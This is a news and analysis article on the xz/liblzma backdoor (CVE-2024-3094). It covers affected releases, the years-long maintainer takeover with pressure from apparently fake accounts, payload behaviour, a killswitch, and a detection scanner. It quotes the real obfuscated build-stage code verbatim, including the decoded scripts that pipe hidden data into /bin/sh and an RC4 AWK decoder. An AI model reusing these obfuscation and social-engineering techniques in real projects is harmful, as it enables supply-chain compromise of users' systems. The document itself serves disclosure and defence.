Backdoor detected in the xz/liblzma library that allows logging in via sshd

A backdoor (CVE-2024-3094) has been discovered in the XZ Utils package, which includes the liblzma library and utilities for working with compressed data in the ".xz" format. The backdoor allows intercepting and modifying data processed by applications linked against liblzma. Its main target is the OpenSSH server, which in some distributions is linked to the libsystemd library, which in turn uses liblzma. Linking sshd to the vulnerable library allows attackers to gain access to the SSH server without authentication.

The backdoor was present in the official releases 5.6.0 and 5.6.1, published on February 24 and March 9, 2024. These releases made it into some distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE Factory and Tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current and Manjaro testing. All users of xz 5.6.0 and 5.6.1 are advised to roll back to version 5.4.6 immediately.
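
As a rough illustration of the advice above, the following sketch checks whether a version string is one of the two affected releases. The function names are made up for this example, and it assumes that the first line of `xz --version` ends with the upstream version number; a distribution's package version may follow a different scheme.

```shell
#!/bin/sh
# Return 0 (true) if the given version string is one of the two releases
# that the article identifies as containing the backdoor.
xz_version_is_backdoored() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Take the last word of the first line of `xz --version`
# (assumed to look like "xz (XZ Utils) 5.4.6").
xz_installed_version() {
    xz --version 2>/dev/null | sed -n '1s/.* //p'
}

# Only run the check if an xz binary is actually installed.
if command -v xz >/dev/null 2>&1; then
    v=$(xz_installed_version)
    if xz_version_is_backdoored "$v"; then
        echo "xz $v: affected release, roll back to 5.4.6"
    else
        echo "xz $v: not one of the affected releases"
    fi
fi
```

This only looks at the xz command-line tool; a separately installed liblzma would have to be checked through the package manager.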

Among the mitigating factors, the backdoored version of liblzma did not make it into the stable releases of the major distributions, although it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo shipped a vulnerable version of xz but are not susceptible to the attack, because they do not apply the systemd-notify patch to openssh, which is what causes sshd to be linked to liblzma. The backdoor only affects x86_64 systems based on the Linux kernel and the Glibc C library.
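
Whether sshd on a given system loads liblzma at all can be checked with ldd, which also lists libraries pulled in indirectly (for example through libsystemd). The sketch below is only an illustration: the helper name is invented, and the sshd path is assumed to be /usr/sbin/sshd.

```shell
#!/bin/sh
# Read `ldd` output on stdin and succeed if any line names liblzma.
ldd_output_mentions_liblzma() {
    grep -q 'liblzma\.so'
}

# Assumption: sshd is installed as /usr/sbin/sshd; adjust for other layouts.
sshd_path=/usr/sbin/sshd
if [ -x "$sshd_path" ] && command -v ldd >/dev/null 2>&1; then
    if ldd "$sshd_path" | ldd_output_mentions_liblzma; then
        echo "sshd loads liblzma (directly or through another library)"
    else
        echo "sshd does not load liblzma"
    fi
fi
```

A positive result only means the library is loaded; it says nothing about whether the installed liblzma is one of the affected releases.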

The backdoor activation code was hidden in m4 macros in the build-to-host.m4 file used by the automake build toolkit. During the build, heavily obfuscated operations on archives used for correctness testing (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) produced an object file with malicious code, which was included in the liblzma library and changed the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tar archives but not in the Git repository. The malicious test archives, however, were present in the repository, i.e. the person who implemented the backdoor had access to both the repository and the release generation process.

When liblzma was used by applications, the malicious changes could be used to intercept or modify data, as well as to affect the operation of sshd. In particular, the malicious code replaced the RSA_public_decrypt function to bypass the authentication process in sshd. The backdoor included protection against detection: it was activated only when the TERM environment variable was not set (i.e. the process was not started from a terminal), the LANG variable was set, the LD_DEBUG and LD_PROFILE variables were not set, and the executable being run was /usr/sbin/sshd. The backdoor also detected when it was being run in debugging environments.

In particular, the file m4/build-to-host.m4 used the following constructs:

Code:
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
 gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

In the first construct, the grep operation found the file tests/files/bad-3-corrupt_lzma2.xz, which was decompressed to form a script:

Code:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 .... && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
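
The grep call in the first construct searches for a line ending in four "#" characters, five alphanumeric characters and four more "#" characters, which is the shape of the "####Hello####" and "####World####" markers in the script. The sketch below tries the same pattern and flags on harmless throwaway files; the function and file names are invented for the illustration.

```shell
#!/bin/sh
# List files under a directory that contain a line ending in the
# "####<5 alphanumerics>####" marker, using the same grep flags as the
# macro: -a (treat binary as text), -E (extended regex), -r (recursive),
# -l (print file names only), -s (suppress error messages).
find_marker_files() {
    grep -aErls "#{4}[[:alnum:]]{5}#{4}$" "$1" 2>/dev/null
}

# Demonstration on throwaway files in a temporary directory.
demo_dir=$(mktemp -d)
printf '####Hello####\nsome payload\n####World####\n' > "$demo_dir/marked.txt"
printf 'no marker here\n' > "$demo_dir/plain.txt"
find_marker_files "$demo_dir"      # lists marked.txt but not plain.txt
rm -rf "$demo_dir"
```

Searching by content rather than by file name meant that the name of the test archive never had to appear in the macro.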

How the attackers managed to gain access to the infrastructure of the xz project has not yet been fully clarified. It is also not clear how many users and projects were compromised as a result of the backdoor. The alleged author of the backdoor, Jia Tan (JiaT75), who placed the archives with malicious code in the repository, corresponded with Fedora developers and sent pull requests to Debian related to moving the distributions to the xz 5.6.0 branch. He did not arouse suspicion, since he had participated in the development of xz over the past two years and was the second most active developer by number of changes. In addition to the xz project, the alleged author of the backdoor also participated in the development of the xz-java and xz-embedded packages. Moreover, a few days ago Jia Tan was included in the list of maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was detected after analyzing excessive CPU consumption and errors reported by valgrind when connecting via ssh to systems based on Debian sid. It is noteworthy that the xz 5.6.1 release included changes prepared by the alleged author of the backdoor in response to complaints about sshd slowdowns and crashes that occurred after upgrading to xz 5.6.0 with the backdoor. In addition, last year Jia Tan made changes incompatible with the "-fsanitize=address" checking mode, which led to ifunc support being disabled during fuzz testing.

GitHub has completely blocked the xz, xz-java, and xz-embedded repositories, which are now unavailable for analysis or for downloading past versions. The last working copy of the project site remains available on archive.org.

+++

A retrospective of how the backdoor was promoted into the xz package.

Presumably, the backdoor in the xz package was implemented by the developer Jia Tan, who received maintainer status in 2022 and published releases starting with version 5.4.2. In addition to the xz project, the alleged author of the backdoor also participated in the development of the xz-java and xz-embedded packages, and was added to the maintainers of the XZ Embedded project used in the Linux kernel.

Two other participants, Jigar Kumar and Hans Jansen, who appear to be fictitious personas, were also involved in promoting the backdoor. In April 2022 Jigar Kumar pushed for the adoption of Jia Tan's early patches to xz, which implemented support for string filters, and put moral pressure on Lasse Collin, the maintainer at the time, complaining that he was unable to fulfill his duties and was not accepting useful patches. In June, Lasse Collin agreed that the project needed a new maintainer, mentioned burnout and mental health issues, and handed over maintainer rights to Jia Tan. After that, the user Jigar Kumar no longer appeared on the mailing list.

Having received maintainer rights, Jia Tan began actively adding changes to the project and, according to statistics, ranked second among developers by number of changes over two years. In March 2023, the contact responsible for the xz package in the oss-fuzz service was changed from Lasse Collin to Jia Tan, and in June changes were made to xz that added support for the IFUNC mechanism to liblzma (the crc64_fast constructor was replaced with ifunc), which was later used to organize function interception in the backdoor. The change was proposed by Hans Jansen, and Jia Tan accepted it into xz. The Hans Jansen account had been created just before the pull request was sent.

In July 2023, Jia Tan sent a request to the oss-fuzz developers to disable ifunc checking because of its incompatibility with the "-fsanitize=address" mode. In early February 2024, the link to the project's website in oss-fuzz and on the tukaani.org main page was changed from "tukaani.org/xz/" to "xz.tukaani.org", a subdomain hosted on GitHub Pages and personally controlled by Jia Tan. On February 23, archives for testing the decoder were added to the xz repository, among them the files bad-3-corrupt_lzma2.xz and good-large_compressed.lzma with the hidden backdoor. The m4 macros for activating the backdoor were included only in the tar archive of release 5.6.0 and were left out of the Git repository, although they were listed in the .gitignore file.

On March 17, Hans Jansen, who had previously developed the patches with IFUNC support, registered as a participant in the Debian project, and on March 25 he sent a request to update the version of the xz-utils package in the Debian repository. Requests to update the version were also received by Fedora and Ubuntu developers (in Ubuntu, the repository was frozen and the change was rejected).

Requests to update the xz version were also joined by some users who stated that the new version fixed crashes detected when debugging under valgrind (the problems occurred due to incorrect detection of the stack layout in the backdoor handler, and the backdoor developers tried to fix them in xz 5.6.1). Andres Freund, a Microsoft employee involved in the development of PostgreSQL, also became interested in the failures; he uncovered the backdoor and notified the community about it.
 
Analysis of the backdoor activation and operation logic in the xz package.

Preliminary results are available from the reverse engineering of the malicious object file embedded in liblzma as a result of the campaign to promote the backdoor into the xz package. Initially, it was assumed that the backdoor allowed bypassing authentication in sshd and gaining access to the system via SSH. A more detailed analysis showed that this is not the case: the backdoor makes it possible to execute arbitrary code on the system without leaving traces in the sshd logs.

In particular, the RSA_public_decrypt function intercepted by the backdoor verifies the host signature using a fixed Ed448 key and, if verification succeeds, executes the code transmitted by the external host using the system() function, at a stage before the sshd process drops privileges. The data containing the code to execute is extracted from the "N" parameter passed to the RSA_public_decrypt function (the "n" field of the rsa_st structure containing the public key transmitted by the external host), checked against a checksum, and decrypted using a predefined ChaCha20 key before the Ed448 digital signature is verified.

The standard host key exchange mechanism is used as the trigger for activating the backdoor in sshd. The backdoor takes advantage of the fact that OpenSSH certificates include the public key of the signer, and responds only to a key prepared by the attacker that corresponds to the predefined fixed Ed448 key. If the public key signature verification fails, or if the integrity of the execution data is not confirmed, the backdoor returns control to the regular SSH functions.

Since the attacker's private key is unknown, it is impossible to write test code that activates the backdoor, and therefore impossible to implement a network scanner for compromised hosts. Researchers have prepared a script that demonstrates the technique of substituting a public key with arbitrary content into an OpenSSH certificate sent by the SSH client, which is then processed in the RSA_public_decrypt function intercepted by the backdoor.

The researchers also noticed a killswitch that neutralizes the backdoor on the local system if the environment variable "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" is set before sshd is launched.
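
Whether a given process was started with this setting can be checked on Linux by reading its environment from /proc. The following is only a sketch: the function name is invented, the PID is passed in as a placeholder argument, and relying on the killswitch is no substitute for removing the affected packages.

```shell
#!/bin/sh
# Succeed if a NUL-separated environment dump (the format of
# /proc/<pid>/environ on Linux) contains the killswitch setting
# reported by the researchers.
environ_has_killswitch() {
    tr '\0' '\n' < "$1" | grep -qx 'yolAbejyiejuvnup=Evjtgvsh5okmkAvj'
}

# Usage sketch: the PID comes from the first script argument (placeholder).
# Reading another user's /proc/<pid>/environ normally requires root.
pid=${1:-}
if [ -n "$pid" ] && [ -r "/proc/$pid/environ" ]; then
    if environ_has_killswitch "/proc/$pid/environ"; then
        echo "killswitch is set for PID $pid"
    else
        echo "killswitch is not set for PID $pid"
    fi
fi
```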

Also worth noting is a detailed analysis of the shell constructs used to obfuscate the process of extracting the object file with the backdoor and substituting it into the liblzma library. During the build of the xz package, the build-to-host.m4 script ran code that found the bad-3-corrupt_lzma2.xz archive among the test files, replaced some characters in it, turning it into an intact archive, and extracted the shell script from it.

Code:
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
gl_path_map='tr "\t \-_" " \t_\-"
'
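
The tr call stored in gl_path_map swaps tab with space and "-" with "_". Its effect is easy to see on harmless text; the sketch below uses an invented function name and assumes a tr implementation (such as GNU tr) that treats "\-" as a literal dash.

```shell
#!/bin/sh
# Same character map as gl_path_map: tab <-> space and '-' <-> '_'.
# The backslash before '-' keeps tr from reading it as a range operator.
swap_chars() {
    tr "\t \-_" " \t_\-"
}

# Dashes become underscores and the underscore becomes a dash.
printf 'a-b_c-d\n' | swap_chars
```

Because every character is exchanged with its partner, applying the map a second time restores the original bytes.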

The resulting shell script extracted another shell script piece by piece from the contents of the good-large_compressed.lzma archive, skipping certain sequences with the head and tail commands, and replacing characters with the tr command.

Code:
####Hello####
# a few binary bytes here, but as it's a comment they are ignored
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
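
The long chain of head calls in the script alternately discards a block of bytes and passes the next block through, with every head reading from the same input stream. A reduced version of the pattern on harmless data might look like the sketch below. The function name and block sizes are invented, and the sketch assumes GNU head, which consumes only the bytes it was asked for so that the next head continues where the previous one stopped.

```shell
#!/bin/sh
# Skip $1 bytes, keep $2 bytes, skip $1 bytes again, keep $2 bytes again,
# all reading from one shared stdin.
skip_keep_twice() {
    (head -c "$1" >/dev/null) && head -c "$2" &&
    (head -c "$1" >/dev/null) && head -c "$2"
}

# 4 filler bytes, 8 wanted bytes, 4 filler bytes, 8 wanted bytes.
printf 'xxxxAAAAAAAAyyyyBBBBBBBB' | skip_keep_twice 4 8
echo
```

In the script above the same idea is repeated many times with 1024-byte gaps and 2048-byte blocks, so the hidden data is interleaved with filler inside the decompressed test file.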

As a result, a rather complex and lengthy shell script was produced that extracts the backdoor file directly from the good-large_compressed.lzma archive, decrypts it and embeds it in liblzma. Among other things, the script included an implementation of a plugin mechanism that makes it possible to deliver additional executable components later by placing new test archives, located by signature search, without changing good-large_compressed.lzma and bad-3-corrupt_lzma2.xz. The code also included a decoder based on the RC4 algorithm, implemented in AWK:

Code:
N=0
W=88664
else
N=88664
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
 
Changes made by the author of the backdoor to block security mechanisms continue to surface in the xz project repository. In the CMakeLists.txt build script, a change was identified that prevented the Landlock application isolation mechanism from being used in xz even when the system supported it. A stray dot was intentionally added to the C code that checks for the availability of the Landlock system call, which caused the Landlock check to fail under all conditions.

The change was added by Jia Tan on February 26 under the guise of implementing a more thorough check for Landlock support. Previously, Landlock support was inferred solely from the presence of the header file "linux/landlock.h"; the change added a test written in C that additionally calls prctl for verification. Because of the dot left at the beginning of a line, this code did not compile and the test always failed.
 
In the wake of the highly publicized XZ Utils supply chain attack (CVE-2024-3094), Binarly has released a publicly available scanner to detect an implant in any Linux binary.

The approach used in the utility differs from existing checks, which rely on matching byte strings, blacklisting file hashes, and YARA rules, which can lead to false positives.

Binarly has developed a dedicated scanner that uses static analysis of binary files to detect tampering with transitions in the GNU Indirect Function (IFUNC) mechanism.

In particular, it examines transitions that are flagged as suspicious when malicious IFUNC resolvers are implanted.

The GCC compiler's IFUNC attribute allows developers to create multiple versions of the same function, which are then selected at runtime based on various criteria, such as processor type.
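
Which symbols in a library are resolved through this mechanism can be listed with readelf, where they appear with the type IFUNC. The sketch below is not how the Binarly scanner works; it only filters readelf's symbol table. The function name is invented and the library path is an assumption that varies between distributions.

```shell
#!/bin/sh
# Read `readelf -W -s` output on stdin and print the names of symbols
# whose type column (4th field) is IFUNC.
list_ifunc_symbols() {
    awk '$4 == "IFUNC" { print $8 }'
}

# Usage sketch; the path below is an assumption, adjust it as needed.
lib=/usr/lib/x86_64-linux-gnu/liblzma.so.5
if [ -r "$lib" ] && command -v readelf >/dev/null 2>&1; then
    readelf -W -s "$lib" | list_ifunc_symbols
fi
```

The presence of IFUNC symbols is not in itself a sign of compromise, since the mechanism was added to liblzma as a regular feature; the listing only shows where a resolver function decides at load time which implementation is used.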

One of the main methods used by the XZ backdoor to gain initial runtime control is the GNU Indirect Function (ifunc) attribute, which lets the GCC compiler resolve indirect function calls at runtime.

The XZ backdoor modifies ifunc calls so that the is_arch_extension_supported check, which should simply invoke cpuid, instead calls _get_cpuid, a function exported by the payload object file (i.e. liblzma_la-crc64-fast.o), so that a malformed _get_cpuid() is executed.

By modifying IFUNC calls in this way, the backdoor intercepts execution and brings its malicious code into play.

The Binarly utility scans various points in the supply chain, in addition to the XZ Utils project, and therefore the results are much more reliable.

Detection is based on behavioral analysis and can automatically detect any variants if a similar backdoor is embedded somewhere else, even after recompiling or changing the code.

The scanner is available on xz.fail, where any number of binary files can be uploaded for verification.

In addition, Binarly introduced a public API for conducting larger-scale scanning.
 